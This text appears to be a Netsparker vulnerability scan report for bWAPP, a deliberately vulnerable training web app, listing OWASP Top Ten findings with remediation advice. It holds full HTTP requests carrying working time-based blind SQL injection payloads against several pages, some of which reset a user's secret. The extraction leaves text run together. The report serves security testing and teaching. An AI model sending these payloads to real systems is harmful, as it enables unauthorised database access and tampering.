VULNERABILITIES BY OWASP TOP TEN 2013 - MME BVBA
OWASP TOP TEN 2013 SCAN REPORT SUMMARYTARGET URL http://itsecgames.com/bWAPP/aim.phpSCAN DATE 4/11/2014 15:00:06REPORT DATE 4/11/2014 17:12:45SCAN DURATION 01:31:06TotalRequests177058AverageSpeed32,39 req/sec.167105647identifiedconfirmedSCAN EXPLANATIONEXPLANATION This report is generated based on OWASP Top Ten 2013classification. There are 64 more vulnerabilities that arenot shown below. Please take a look at the detailed scanreport to see them.criticalinformational167 vulnerabilities listed in OWASP Top Ten 2013 found on this web site.1 / 211
VULNERABILITIES BY OWASP TOP TEN 2013OWASP A1 - ellshock.shCriticalBash Command Injection Vulnerability(Shellshock Bug)/bWAPP/commandi.phpCriticalCommand Injection/bWAPP/commandi.phpCriticalBlind Command Injection/bWAPP/commandi blind.phpCriticalBlind Command Injection/bWAPP/phpi.phpCriticalRemote Code Evaluation (PHP)/bWAPP/rlfi.phpCriticalRemote Code Evaluation via Local FileInclusion (PHP)/bWAPP/rlfi.phpCriticalRemote File Inclusion/bWAPP/sqli 1.phpCritical[Probable] SQL Injection/bWAPP/sqli 1.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 1.phpCriticalSQL Injection/bWAPP/sqli 1.phpCriticalBlind SQL Injection/bWAPP/sqli 10-2.phpCritical[Probable] SQL Injection/bWAPP/sqli 10-2.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 10-2.phpCriticalBlind SQL Injection/bWAPP/sqli 13.phpCriticalSQL Injection/bWAPP/sqli 13.phpCritical[Probable] SQL Injection/bWAPP/sqli 13.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 13.phpCriticalBlind SQL Injection/bWAPP/sqli 15.phpCriticalBlind SQL Injection/bWAPP/sqli 16.phpCriticalBlind SQL Injection/bWAPP/sqli 16.phpCritical[Probable] SQL Injection/bWAPP/sqli 16.phpCriticalSQL Injection/bWAPP/sqli 2.phpCritical[Probable] SQL Injection/bWAPP/sqli 2.phpCriticalBlind SQL Injection/bWAPP/sqli 2.phpCriticalSQL Injection/bWAPP/sqli 2.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 3.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 3.phpCritical[Probable] SQL Injection/bWAPP/sqli 3.phpCriticalBlind SQL Injection/bWAPP/sqli 3.phpCriticalSQL Injection/bWAPP/sqli 3.phpCriticalBlind SQL Injection/bWAPP/sqli 3.phpCritical[Probable] SQL Injection/bWAPP/sqli 3.phpCriticalSQL Injection/bWAPP/sqli 4.phpCriticalBlind SQL Injection/bWAPP/sqli 4.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 5.phpCriticalBlind SQL Injection/bWAPP/sqli 6.phpCritical[Probable] SQL Injection/bWAPP/sqli 6.phpCriticalBoolean Based SQL Injection/bWAPP/sqli 6.phpCriticalBlind SQL Injection/bWAPP/sqli 6.phpCriticalSQL Injection/bWAPP/sqli 7.phpCriticalSQL Injection2 / 211
/bWAPP/sqli 7.phpCritical[Probable] SQL Injection/bWAPP/sqli 7.phpCriticalBlind SQL Injection/bWAPP/sqli 8-2.phpCritical[Probable] SQL Injection/bWAPP/sqli 8-2.phpCriticalSQL Injection/bWAPP/sqli 8-2.phpCriticalBlind SQL Injection/bWAPP/sqli 8-2.phpCritical[Probable] SQL Injection/bWAPP/sqli 8-2.phpCriticalBlind SQL Injection/bWAPP/ssii.shtmlCritical[Possible] Command Injection/bWAPP/ssii.shtmlCritical[Possible] Command Injection/bWAPP/ws soap.phpCriticalBlind SQL Injection/bWAPP/ws soap.phpCritical[Probable] SQL Injection/bWAPP/xss login.phpCriticalSQL Injection/bWAPP/xss login.phpCritical[Probable] SQL Injection/bWAPP/xss login.phpCritical[Probable] SQL Injection/bWAPP/xss login.phpCriticalBoolean Based SQL Injection/bWAPP/xss login.phpCriticalSQL Injection/bWAPP/xss login.phpCriticalBlind SQL Injection/bWAPP/xss login.phpCriticalBlind SQL Injection/bWAPP/xxe-2.phpCritical[Probable] SQL Injection/bWAPP/xxe-2.phpCriticalBlind SQL Injection/bWAPP/xxe-2.phpCriticalBlind SQL Injection/bWAPP/xxe-2.phpCritical[Probable] SQL Injection/bWAPP/xxe-2.phpCriticalSQL InjectionURLSeverityVulnerability/bWAPP/http response splitting.phpMediumOpen Redirection/bWAPP/iframei.phpMediumFrame Injection/bWAPP/unvalidated redir fwd 1.phpMediumOpen Redirection/bWAPP/unvalidated redir fwd 2.phpMediumOpen RedirectionOWASP A1 - InjectionOWASP A3 - Cross-Site Scripting (XSS)URLSeverityVulnerability/bWAPP/csrf 3.phpImportantCross-site Scripting/bWAPP/directory traversal 2.phpImportantCross-site Scripting/bWAPP/hpp-2.phpImportantCross-site Scripting/bWAPP/htmli current url.phpImportantCross-site Scripting/bWAPP/htmli get.phpImportantCross-site Scripting/bWAPP/htmli get.phpImportantCross-site Scripting/bWAPP/htmli post.phpImportantCross-site Scripting/bWAPP/htmli post.phpImportantCross-site Scripting/bWAPP/htmli stored.phpImportantPermanent Cross-site Scripting/bWAPP/htmli stored.phpImportantCross-site Scripting/bWAPP/iframei.phpImportantCross-site Scripting/bWAPP/iframei.phpImportantCross-site Scripting/bWAPP/iframei.phpImportantCross-site Scripting/bWAPP/insecure direct object ref 1.phpImportantCross-site Scripting3 / 211
/bWAPP/rlfi.phpImportantPermanent Cross-site Scripting/bWAPP/rlfi.phpImportantCross-site Scripting/bWAPP/rlfi.phpImportantCross-site Scripting via Remote File Inclusion/bWAPP/sqli 1.phpImportantCross-site Scripting/bWAPP/sqli 12.phpImportantCross-site Scripting/bWAPP/sqli 12.phpImportantPermanent Cross-site Scripting/bWAPP/sqli 12.phpImportant[Possible] Permanent Cross-site Scripting/bWAPP/sqli 13.phpImportantCross-site Scripting/bWAPP/sqli 16.phpImportantCross-site Scripting/bWAPP/sqli 2.phpImportantCross-site Scripting/bWAPP/sqli 3.phpImportantCross-site Scripting/bWAPP/sqli 3.phpImportantCross-site Scripting/bWAPP/sqli 6.phpImportantCross-site Scripting/bWAPP/sqli 7.phpImportantCross-site Scripting/bWAPP/sqli 7.phpImportantPermanent Cross-site Scripting/bWAPP/sqli 8-2.phpMedium[Possible] Cross-site Scripting/bWAPP/sqli 8-2.phpMedium[Possible] Cross-site Scripting/bWAPP/ssii.shtmlImportantPermanent Cross-site Scripting/bWAPP/ssii.shtmlImportantCross-site Scripting/bWAPP/ssii.shtmlImportantCross-site Scripting/bWAPP/ws soap.php/%22ns %22netsparker(0x0003FA)ImportantCross-site Scripting/bWAPP/xss ajax 1-2.phpMedium[Possible] Cross-site Scripting/bWAPP/xss ajax 2-2.phpImportantCross-site Scripting/bWAPP/xss back button.phpImportantCross-site Scripting/bWAPP/xss eval.phpImportantCross-site Scripting/bWAPP/xss get.phpImportantCross-site Scripting/bWAPP/xss get.phpImportantCross-site Scripting/bWAPP/xss href-2.phpImportantCross-site Scripting/bWAPP/xss json.phpImportantCross-site Scripting/bWAPP/xss login.phpImportantCross-site Scripting/bWAPP/xss login.phpImportantCross-site Scripting/bWAPP/xss php self.php/%22onload %22netsparker(9)ImportantCross-site Scripting/bWAPP/xss php self.phpImportantCross-site Scripting/bWAPP/xss php self.phpImportantCross-site Scripting/bWAPP/xss post.phpImportantCross-site Scripting/bWAPP/xss post.phpImportantCross-site Scripting/bWAPP/xss referer.phpImportantCross-site Scripting/bWAPP/xss stored 1.phpImportantCross-site Scripting/bWAPP/xss stored 1.phpImportantPermanent Cross-site Scripting/bWAPP/xss stored 3.phpImportantCross-site Scripting/bWAPP/xxe-2.phpMedium[Possible] Cross-site Scripting/bWAPP/xxe-2.phpMedium[Possible] Cross-site ScriptingOWASP A4 - Insecure Direct Object ReferencesURLSeverityVulnerability/bWAPP/directory traversal 1.phpImportantLocal File Inclusion4 / 211
/bWAPP/directory traversal 1.phpImportant[Possible] Local File Inclusion/bWAPP/rlfi.phpImportantLocal File InclusionOWASP A5 - Security in/phpinfo.phpLowInformation Disclosure (phpinfo())/bWAPP/admin/phpinfo.php/%20ns netsparker(0x00316E)LowInformation Disclosure (phpinfo())/bWAPP/admin/phpinfo.php/%22ns %22netsparker(0x00316C)LowInformation Disclosure 522netsparker%25280x003173%2529LowInformation Disclosure (phpinfo())/bWAPP/admin/phpinfo.php/'ns 'netsparker(0x00316D)LowInformation Disclosure (phpinfo())/bWAPP/aimLowApache MultiViews Enabled/bWAPP/config.incMedium[Possible] Source Code Disclosure (PHP)/bWAPP/directory traversal 1.phpMedium[Possible] Source Code Disclosure (PHP)/bWAPP/directory traversal 2.phpLowProgramming Error Message/bWAPP/images/LowOPTIONS Method Enabled/bWAPP/images/InformationDirectory Listing (Apache)/bWAPP/information disclosure 1.phpLowInformation Disclosure (phpinfo())/bWAPP/information disclosure 1.php/%20ns netsparker(0x0003D7)LowInformation Disclosure (phpinfo())/bWAPP/information disclosure 1.php/%22ns %22netsparker(0x0003BC)LowInformation Disclosure (phpinfo())/bWAPP/information disclosure 9LowInformation Disclosure (phpinfo())/bWAPP/information disclosure 1.php/'ns 'netsparker(0x0003CB)LowInformation Disclosure ion[Possible] Database Connection [Possible] Source Code Disclosure (PHP)/bWAPP/phpinfo.phpLowInformation Disclosure (phpinfo())/bWAPP/phpinfo.php/%20ns netsparker(0x00041F)LowInformation Disclosure (phpinfo())/bWAPP/phpinfo.php/%22ns %22netsparker(0x000409)LowInformation Disclosure sparker%25280x000421%2529LowInformation Disclosure (phpinfo())/bWAPP/phpinfo.php/'ns 'netsparker(0x000414)LowInformation Disclosure (phpinfo())/bWAPP/portal.bakMedium[Possible] Source Code Disclosure (PHP)/bWAPP/sm mitm 1.phpLowAutocomplete Enabled/bWAPP/sm mitm 1.phpInformationAutocomplete Enabled (Password Field)/bWAPP/smgmt cookies secure.phpLowCookie Not Marked as HttpOnly/bWAPP/sqli 1.phpLowDatabase Error Message Disclosure/bWAPP/sqli 1.phpImportantDatabase User Has Admin PrivilegesOWASP A6 - Sensitive Data ExposureURLSeverityVulnerability/bWAPP/sqli 3.phpImportantPassword Transmitted over HTTP/bWAPP/xmli 1.phpMediumPassword Transmitted over Query String5 / 211
OWASP A7 - Missing Function Level Access w[Possible] Backup File Disclosure/bWAPP/portal.bakImportantBackup Source Code DetectedOWASP A8 - Cross-Site Request Forgery [Possible] Cross-site Request ForgeryDetected/bWAPP/sqli 3.phpLow[Possible] Cross-site Request Forgery inLogin Form DetectedOWASP A9 - Using Components with Known phpInformationOut-of-date Version (Apache)/bWAPP/aim.phpInformationOut-of-date Version (PHP)/bWAPP/aim.phpInformationOut-of-date Version (OpenSSL)/bWAPP/sqli 1.phpImportantOut-of-date Version (MySQL)/bWAPP/ws soap.phpInformationOut-of-date Version (NuSOAP)6 / 211
1. Blind SQL Injection19 TOTALNetsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL commandrather than as normal data by the backend database.This is an extremely common vulnerability and its successful exploitation can have critical implications.Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQLinjection was not obvious, but the different responses from the page based on the injection test allowed us to identify andconfirm the SQL injection.CRITICALCONFIRMED19ImpactDepending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of thefollowing attacks successfully:Reading, updating and deleting arbitrary data or tables from the databaseExecuting commands on the underlying operating systemActions to Take1. See the remedy for solution.2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (objectrelational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.3. Locate the all dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change alllegacy code to use these new libraries.)4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.RemedyA robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost allmodern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with stringconcatenation.Required Skills for Successful ExploitationThere are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, itshould be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discoverand leverage them. SQL injection is one of the most common web application vulnerabilities.External ReferencesOWASP SQL injectionSQL injection CheatsheetRemedy ReferencesMSDN - Protect From SQL injection in ASP.NETClassificationOWASP 2013-A11.1. /bWAPP/sqli 10-2.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli 10-2.php?title -1%27 or 1%3d(SELECT 1 FROM (SELECT eGET-1' or 1 (SELECT 1 FROM (SELECTSLEEP(25))A) 'RequestGET /bWAPP/sqli 10-2.php?title -1%27 or 1%3d(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27 HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept: application/json, text/javascript, */*; q 0.01Referer: http://itsecgames.com/bWAPP/sqli 10-1.phpX-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre actionAccept-Encoding: gzip, deflate7 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 14:34:44 GMTPragma: no-cacheServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Length: 2519Content-Type: text/json; charset utf-8Expires: Thu, 19 Nov 1981 08:52:00 GMT[{"0":"1","id":"1","1":"G.I. Joe: Retaliation","title":"G.I. Joe: Retaliation","2":"2013","release braCommander","main character":"Cobra "100","tickets stock":"100"},{"0":"2","id":"2","1":"Iron Man","title":"IronMan","2":"2008","release ny Stark","main 371746","6":"53","tickets stock":"53"},{"0":"3","id":"3","1":"Man of Steel","title":"Man ofSteel","2":"2013","release ark Kent","main 770828","6":"78","tickets stock":"78"},{"0":"4","id":"4","1":"Terminator ","release hn Connor","main 0438488","6":"100","tickets stock":"100"},{"0":"5","id":"5","1":"The Amazing Spider-Man","title":"The Amazing SpiderMan","2":"2012","release ter Parker","main t0948470","6":"13","tickets stock":"13"},{"0":"6","id":"6","1":"The Cabin in the Woods","title":"The Cabin in theWoods","2":"2011","release me zombies","main t1259521","6":"666","tickets stock":"666"},{"0":"7","id":"7","1":"The Dark Knight Rises","title":"The Dark Knight Rises","2 1.2. login[1]/text()[1]XML Parameter' (SELECT 1 FROM (SELECT SLEEP(25))A) '/reset[1]/secret[1]/text()[1]XML ParameterAny bugs?RequestPOST /bWAPP/xxe-2.php HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept: */*Origin: http://itsecgames.comReferer: http://itsecgames.com/bWAPP/insecure direct object ref 3.phpAccept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre %2FbWAPP%2Fxss stored 2.phpAccept-Encoding: gzip, deflateContent-Length: 95Content-Type: text/xml; charset utf-8 reset login ' (SELECT 1 FROM (SELECT SLEEP(25))A) ' /login secret Any bugs? /secret /reset ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 15:13:55 GMTPragma: no-cacheServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Length: 64Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMT' (SELECT 1 FROM (SELECT SLEEP(25))A) ''s secret has been reset!1.3. /bWAPP/sqli 6.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli 6.phpParametersParameterTypeValuetitlePOST-1' or 1 (SELECT 1 FROM (SELECTSLEEP(25))A) 'actionPOSTsearchRequestPOST /bWAPP/sqli 6.php HTTP/1.1Cache-Control: no-cacheReferer: http://itsecgames.com/bWAPP/sqli 6.phpAccept: text/xml,application/xml,application/xhtml xml,text/html;q 0.9,text/plain;q 0.8,image/png,*/*;q 0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre actionAccept-Encoding: gzip, deflateContent-Length: 74Content-Type: application/x-www-form-urlencodedtitle -1%27 or 1%3d(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27&action search8 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 14:14:51 GMTPragma: no-cacheTransfer-Encoding: chunkedServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMT !DOCTYPE html html head meta http-equiv "Content-Type" content "text/html; charset UTF-8" !-- link rel "stylesheet" type "text/css" href "https://fonts.googleapis.com/css?family Architects Daughter" -- link rel "stylesheet" type "text/css" href "stylesheets/stylesheet.css" media "screen" / link rel "shortcut icon" href "images/favicon.ico" type "image/x-icon" / !-- script src "//html5shiv.googlecode.com/svn/trunk/html5.js" /script -- script src "js/html5.js" /script title bWAPP - SQL Injection /title /head body header h1 bWAPP /h1 h2 an extremely buggy web app ! /h2 /header div id "menu" table tr td a href "portal.php" Bugs /a /td td a href "password change.php" Change Password /a /td td a href "user extra.php" Create User /a /td td a href "security level set.php" Set Security Level /a /td td a href "reset.php" onclick "return confirm('All settings will be cleared. Are you sure?');" Reset /a /td td a href "credits.php" Credits /a /td td a href "http://itsecgames.blogspot.com" target " blank" Blog /a /td td a href "logout.php" onclick "return confirm('Are you sure you want to leave?');" Logout /a /td td font color "red" Welcome Bee /font /td /tr /table /div div id "main" h1 SQL Injection (POST/Search) /h1 form action "/bWAPP/sqli 6.php" method "POST" p label for "title" Search for a movie: /label i 1.4. login[1]/text()[1]XML Parameterbee/reset[1]/secret[1]/text()[1]XML Parameter' (SELECT 1 FROM (SELECT SLEEP(25))A) 'RequestPOST /bWAPP/xxe-2.php HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept: */*Origin: http://itsecgames.comReferer: http://itsecgames.com/bWAPP/insecure direct object ref 3.phpAccept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre %2FbWAPP%2Fxss stored 2.phpAccept-Encoding: gzip, deflateContent-Length: 89Content-Type: text/xml; charset utf-8 reset login bee /login secret ' (SELECT 1 FROM (SELECT SLEEP(25))A) ' /secret /reset 9 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 15:16:47 GMTPragma: no-cacheServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Length: 28Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMTbee's secret has been reset!1.5. /bWAPP/ws soap.phpCONFIRMEDhttp://itsecgames.com/bWAPP/ws [1]/soap:Body[1]/q1:gettickets stock[1]/title[1]/text()[1]SOAP XML Parameter' (SELECT 1 FROM (SELECT SLEEP(25))A) 'RequestPOST /bWAPP/ws soap.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveAccept: text/xml,application/xml,application/xhtml xml,text/html;q 0.9,text/plain;q 0.8,image/png,*/*;q 0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36SOAPAction: "urn:tickets stock#get tickets stock"Accept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0Accept-Encoding: gzip, deflateContent-Length: 624Content-Type: text/xml; charset utf-8 ?xml version "1.0" encoding "utf-8"? soap:Envelope xmlns:soap "http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc "http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns "urn:movie service"xmlns:types "urn:movie service/encodedTypes" xmlns:xsi "http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd "http://www.w3.org/2001/XMLSchema" soap:Body soap:encodingStyle "http://schemas.xmlsoap.org/soap/encoding/" q1:get tickets stock xmlns:q1 "urn:tickets stock" title xsi:type "xsd:string" ' (SELECT 1 FROM (SELECT SLEEP(25))A) ' /title /q1:get tickets stock /soap:Body /soap:Envelope ResponseHTTP/1.1 200 OKConnection: Keep-AliveDate: Tue, 04 Nov 2014 15:28:10 GMTServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5X-SOAP-Server: NuSOAP/0.9.5 (1.123)Keep-Alive: timeout 15, max 80Content-Length: 544Content-Type: text/xml; charset ISO-8859-1 ?xml version "1.0" encoding "ISO-8859-1"? SOAP-ENV:Envelope SOAP-ENV:encodingStyle "http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAPENV "http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd "http://www.w3.org/2001/XMLSchema" xmlns:xsi "http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAPENC "http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:Body ns1:get tickets stockResponse xmlns:ns1 "urn:tickets stock" tickets stock xsi:nil "true"xsi:type "xsd:integer"/ /ns1:get tickets stockResponse /SOAP-ENV:Body /SOAP-ENV:Envelope 1.6. /bWAPP/sqli 8-2.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli [1]/text()[1]XML Parameterbee/reset[1]/secret[1]/text()[1]XML Parameter' (SELECT 1 FROM (SELECT SLEEP(25))A) 'RequestPOST /bWAPP/sqli 8-2.php HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept: */*Origin: http://itsecgames.comReferer: http://itsecgames.com/bWAPP/sqli 8-1.phpAccept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre actionAccept-Encoding: gzip, deflateContent-Length: 89Content-Type: text/xml; charset utf-8 reset login bee /login secret ' (SELECT 1 FROM (SELECT SLEEP(25))A) ' /secret /reset 10 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 14:46:31 GMTPragma: no-cacheServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Length: 28Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMTbee's secret has been reset!1.7. /bWAPP/sqli 16.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli 16.phpParametersParameterTypeValueloginPOST' (SELECT 1 FROM (SELECT SLEEP(25))A) 'passwordPOST3formPOSTsubmitRequestPOST /bWAPP/sqli 16.php HTTP/1.1Cache-Control: no-cacheReferer: http://itsecgames.com/bWAPP/sqli 16.phpAccept: text/xml,application/xml,application/xhtml xml,text/html;q 0.9,text/plain;q 0.8,image/png,*/*;q 0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre actionAccept-Encoding: gzip, deflateContent-Length: 76Content-Type: application/x-www-form-urlencodedlogin %27%2b(SELECT 1 FROM (SELECT SLEEP(25))A)%2b%27&password 3&form submit11 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 14:25:29 GMTPragma: no-cacheTransfer-Encoding: chunkedServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMT !DOCTYPE html html head meta http-equiv "Content-Type" content "text/html; charset UTF-8" !-- link rel "stylesheet" type "text/css" href "https://fonts.googleapis.com/css?family Architects Daughter" -- link rel "stylesheet" type "text/css" href "stylesheets/stylesheet.css" media "screen" / link rel "shortcut icon" href "images/favicon.ico" type "image/x-icon" / !-- script src "//html5shiv.googlecode.com/svn/trunk/html5.js" /script -- script src "js/html5.js" /script title bWAPP - SQL Injection /title /head body header h1 bWAPP /h1 h2 an extremely buggy web app ! /h2 /header div id "menu" table tr td a href "portal.php" Bugs /a /td td a href "password change.php" Change Password /a /td td a href "user extra.php" Create User /a /td td a href "security level set.php" Set Security Level /a /td td a href "reset.php" onclick "return confirm('All settings will be cleared. Are you sure?');" Reset /a /td td a href "credits.php" Credits /a /td td a href "http://itsecgames.blogspot.com" target " blank" Blog /a /td td a href "logout.php" onclick "return confirm('Are you sure you want to leave?');" Logout /a /td td font color "red" Welcome Bee /font /td /tr /table /div div id "main" h1 SQL Injection (Login Form/User) /h1 p Enter your credentials. /p form action "/bWAPP/sqli 16.php" method "POST" p label for "login" Login: 1.8. /bWAPP/sqli 2.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli 2.php?action go&movie (SELECT 1 FROM (SELECT omovieGET(SELECT 1 FROM (SELECT SLEEP(25))A)RequestGET /bWAPP/sqli 2.php?action go&movie (SELECT 1 FROM (SELECT SLEEP(25))A) HTTP/1.1Cache-Control: no-cacheReferer: http://itsecgames.com/bWAPP/sqli 2.phpAccept: text/xml,application/xml,application/xhtml xml,text/html;q 0.9,text/plain;q 0.8,image/png,*/*;q 0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept-Language: en-us,en;q 0.5X-Scanner: NetsparkerHost: itsecgames.comCookie: PHPSESSID 0f025854e260210551fcb751d5b81388; security level 0; movie genre actionAccept-Encoding: gzip, deflate12 / 211
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, post-check 0, pre-check 0Date: Tue, 04 Nov 2014 14:11:52 GMTPragma: no-cacheTransfer-Encoding: chunkedServer: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod ssl/2.2.8 OpenSSL/0.9.8gX-Powered-By: PHP/5.2.4-2ubuntu5Content-Type: text/htmlExpires: Thu, 19 Nov 1981 08:52:00 GMT !DOCTYPE html html head meta http-equiv "Content-Type" content "text/html; charset UTF-8" !-- link rel "stylesheet" type "text/css" href "https://fonts.googleapis.com/css?family Architects Daughter" -- link rel "stylesheet" type "text/css" href "stylesheets/stylesheet.css" media "screen" / link rel "shortcut icon" href "images/favicon.ico" type "image/x-icon" / !-- script src "//html5shiv.googlecode.com/svn/trunk/html5.js" /script -- script src "js/html5.js" /script title bWAPP - SQL Injection /title /head body header h1 bWAPP /h1 h2 an extremely buggy web app ! /h2 /header div id "menu" table tr td a href "portal.php" Bugs /a /td td a href "password change.php" Change Password /a /td td a href "user extra.php" Create User /a /td td a href "security level set.php" Set Security Level /a /td td a href "reset.php" onclick "return confirm('All settings will be cleared. Are you sure?');" Reset /a /td td a href "credits.php" Credits /a /td td a href "http://itsecgames.blogspot.com" target " blank" Blog /a /td td a href "logout.php" onclick "return confirm('Are you sure you want to leave?');" Logout /a /td td font color "red" Welcome Bee /font /td /tr /table /div div id "main" h1 SQL Injection (GET/Select) /h1 form action "/bWAPP/sqli 2.php" method "GET" p Select a movie: select 1.9. /bWAPP/sqli 3.phpCONFIRMEDhttp://itsecgames.com/bWAPP/sqli dPOST' (SELECT 1 FROM (SELECT SLEEP(25))A) 'formPOSTsubmitRequestPOST /bWAPP/sqli 3.php HTTP/1.1Cache-Control: no-cacheReferer: http://itsecgames.com/bWAPP/sqli 3.phpAccept: text/xml,application/xml,application/xhtml xml,text/html;q 0.9,text/plain;q 0.8,image/png,*/*;q 0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept-Languag
